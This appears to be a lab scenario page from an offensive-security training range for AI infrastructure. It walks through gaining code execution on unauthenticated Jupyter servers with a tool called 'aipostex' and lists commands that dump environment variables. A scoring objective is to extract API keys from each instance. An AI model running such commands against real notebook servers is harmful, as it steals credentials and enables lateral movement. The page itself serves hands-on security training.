Scenario 05: Jupyter Remote Code Execution¶
Difficulty: Intermediate Time: ~20 minutes Prerequisites: Complete Scenario 01 Target: ailab-dev:8888 (Jupyter), ailab-ds:8888 (Jupyter)
Background¶
Jupyter notebooks are the standard interactive computing environment for data scientists and ML engineers. When deployed with default settings, they often use pre-configured tokens or no authentication at all. A compromised Jupyter instance gives an attacker arbitrary code execution in the context of the data science environment — access to datasets, model files, environment variables, and network access to other internal services.
Objective¶
Gain code execution through Jupyter notebooks and extract environment variables, credentials, and accessible resources.
Commands¶
# Exploit Jupyter on the dev workstation
aipostex jupyter --target 172.16.50.10:8888 exec --code "import os; print(os.environ)" --force-exploit
# Exploit Jupyter on the data science host
aipostex jupyter --target 172.16.50.30:8888 exec --code "import os; print(os.environ)" --force-exploit
Expected Finding¶
Jupyter (ailab-dev:8888): - Token-less or weak-token access to notebook server - Environment variables containing API keys, database connection strings - Notebook contents with hardcoded credentials - File system access to local model files and scripts
Jupyter (ailab-ds:8888): - Similar findings with data-science-specific credentials - Access to dataset files and model training artifacts - Network access to vector databases (Qdrant, Weaviate) on the same host
Example finding:
{
"finding_type": "credential",
"service": "jupyter",
"detail": "Environment variable leak",
"key": "OPENAI_API_KEY",
"value": "sk-..."
}
Scoring objective: Extract at least 2 environment variables containing API keys from each Jupyter instance.
Real-World Impact¶
Jupyter is often the weakest link in AI infrastructure. Data scientists prioritize convenience over security — notebooks run with elevated permissions, environment variables contain production API keys, and the file system has access to training data. A single compromised Jupyter instance can pivot to every other service the data scientist had access to.
Follow-On¶
- Scenario 06: Use Jupyter access to reach MLflow, Ray, and W&B
- Scenario 11: Explore MCP tools accessible from ailab-dev